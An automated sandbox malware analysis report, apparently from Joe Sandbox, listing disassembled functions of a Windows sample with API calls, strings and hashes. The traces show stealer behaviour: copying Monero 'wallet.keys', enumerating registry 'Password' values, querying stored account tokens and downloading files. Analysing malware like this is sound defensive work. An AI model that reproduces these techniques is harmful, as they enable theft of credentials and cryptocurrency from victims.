                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: a464d958360feba6ba52707e94c60645377a851efe7752d0b9f2779237c19ecb
                                  • Instruction ID: 433dce78b61df1b623e96e3895cc4d33561e0193c78e00b5c24d373d7aaf4954
                                  • Opcode Fuzzy Hash: a464d958360feba6ba52707e94c60645377a851efe7752d0b9f2779237c19ecb
                                  • Instruction Fuzzy Hash: F4718976900208A7CB14EBA0EC45FEE777CAF88300F448599F61997185DB34DB55DF92
                                  Function 00F61310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F612B4
                                    • Part of subcall function 00F612A0: RtlAllocateHeap.NTDLL(00000000), ref: 00F612BB
                                    • Part of subcall function 00F612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F612D7
                                    • Part of subcall function 00F612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F612F5
                                    • Part of subcall function 00F612A0: RegCloseKey.ADVAPI32(?), ref: 00F612FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F6134F
                                  • lstrlen.KERNEL32(?), ref: 00F6135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00F61377
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F61465
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F614EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 322ff998d6b14556422bcfc54b653ec65b1f877a55c33e80d12956b1ffb68034
                                  • Instruction ID: bd0e1413bd35d36af8dc48b6cf30222af390c483de232625e17bcd3f9169bc0b
                                  • Opcode Fuzzy Hash: 322ff998d6b14556422bcfc54b653ec65b1f877a55c33e80d12956b1ffb68034
                                  • Instruction Fuzzy Hash: 005143B1D5011997CB55FB60DC92FEE733CAF54300F4081A9B60EA2081EE346B89DBA7
                                  Function 00F675D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F6733A
                                    • Part of subcall function 00F672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F673B1
                                    • Part of subcall function 00F672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F6740D
                                    • Part of subcall function 00F672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00F67452
                                    • Part of subcall function 00F672D0: HeapFree.KERNEL32(00000000), ref: 00F67459
                                  • lstrcat.KERNEL32(00000000,00F817FC), ref: 00F67606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00F67648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00F6765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00F6768F
                                  • lstrcat.KERNEL32(00000000,00F81804), ref: 00F676A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00F676D3
                                  • lstrcat.KERNEL32(00000000,00F81808), ref: 00F676ED
                                  • task.LIBCPMTD ref: 00F676FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 0dcfde64a766148ad6cacebd1647edd5eb7bd30256076e2a73c7dcc54baf12bd
                                  • Instruction ID: 88b7df12e4981af4a53d8bd33b6522b4c5db459c308a9193e106edc7d834e54a
                                  • Opcode Fuzzy Hash: 0dcfde64a766148ad6cacebd1647edd5eb7bd30256076e2a73c7dcc54baf12bd
                                  • Instruction Fuzzy Hash: DC315C72900209DBCB58FBB4EC95DFE7B79BF44301B504228F112A7285DB38A986EB51
                                  Function 00F660A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                    • Part of subcall function 00F647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                  • InternetOpenA.WININET(00F80DF7,00000001,00000000,00000000,00000000), ref: 00F6610F
                                  • StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F66147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F6618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F661B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00F661DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F6620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00F66249
                                  • InternetCloseHandle.WININET(?), ref: 00F66253
                                  • InternetCloseHandle.WININET(00000000), ref: 00F66260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 0f85064a04b913c8d9a7e9dc13c502791c923fb438ed3ca59fadf10059f578c5
                                  • Instruction ID: b7af72be11fd54211421515d4411308ca6ce699e9537733e8e7b73f59e96bafc
                                  • Opcode Fuzzy Hash: 0f85064a04b913c8d9a7e9dc13c502791c923fb438ed3ca59fadf10059f578c5
                                  • Instruction Fuzzy Hash: BD51A3B1900218ABDF24DF90DC45BEE7BB8FF44701F5080A8B609A71C0DB756A89DF95
                                  Function 00F672D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F6733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F673B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F6740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00F67452
                                  • HeapFree.KERNEL32(00000000), ref: 00F67459
                                  • task.LIBCPMTD ref: 00F67555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: a1beb6d256aefbee463d942a865f2b61df4b3ae5b7582e323214c501cdaa8875
                                  • Instruction ID: d10bffa1e8a31be582fe81069b0928274d2c37c904ca6acc0e87af7d48c76a60
                                  • Opcode Fuzzy Hash: a1beb6d256aefbee463d942a865f2b61df4b3ae5b7582e323214c501cdaa8875
                                  • Instruction Fuzzy Hash: 09615CB1C042289BDB24DB50CC55BEAB7B8BF44304F0081E9E649A6141DFB4AFC9DFA0
                                  Function 00F6BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 00F6BC9F
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00F6BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 00F6BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 00F6BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: f61b6e35ae45dfb111ac4dc3ede103bb69ba97bf5550de1a8f1c7a9a59181341
                                  • Instruction ID: 9a2ade4d95cb0682e0e690654e972f3b9dbef354e52579b702a63c23fb0ada57
                                  • Opcode Fuzzy Hash: f61b6e35ae45dfb111ac4dc3ede103bb69ba97bf5550de1a8f1c7a9a59181341
                                  • Instruction Fuzzy Hash: 34B155719101089BDB14FBA0DC56EEE773CAF94300F41816AF51AA7091EF386E59EB63
                                  Function 00F76770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 69ed55bedfd887e5e9686c037a59761558cc124c6154c7654a6c3ef3db94eb1c
                                  • Instruction ID: 58be89163974c50fb24b250ea15071eca5ac79a5309228fef115401da4a49dcc
                                  • Opcode Fuzzy Hash: 69ed55bedfd887e5e9686c037a59761558cc124c6154c7654a6c3ef3db94eb1c
                                  • Instruction Fuzzy Hash: E4F01730904609EBD3989FE0E50976D7F74FB04703F4401A9E61A87284DA714E82DB95
                                  Function 00F64FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F64FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F64FD1
                                  • InternetOpenA.WININET(00F80DDF,00000000,00000000,00000000,00000000), ref: 00F64FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00F65011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00F65041
                                  • InternetCloseHandle.WININET(?), ref: 00F650B9
                                  • InternetCloseHandle.WININET(?), ref: 00F650C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 69e5bb66c8ebf99069535e86c7e2304adcd8aa60b7d1f296fc904ebd342f0b52
                                  • Instruction ID: 51d9704ed0ae89cf38a2a63e813202ba00edf3368241b4c97b64bcdf4f0c0a5f
                                  • Opcode Fuzzy Hash: 69e5bb66c8ebf99069535e86c7e2304adcd8aa60b7d1f296fc904ebd342f0b52
                                  • Instruction Fuzzy Hash: 6E312AB5A00218ABDB24CF54DC85BDDBBB4EB48704F5081E9E709A7285C7706AC5DF98
                                  Function 00F78100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,016FDD48,00000000,?,00F80E2C,00000000,?,00000000), ref: 00F78130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F78137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00F78158
                                  • wsprintfA.USER32 ref: 00F781AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2922868504-3474575989
                                  • Opcode ID: b92121a10b5329cf9943744802a09edef387314644850ad491a2332cb6a79f0f
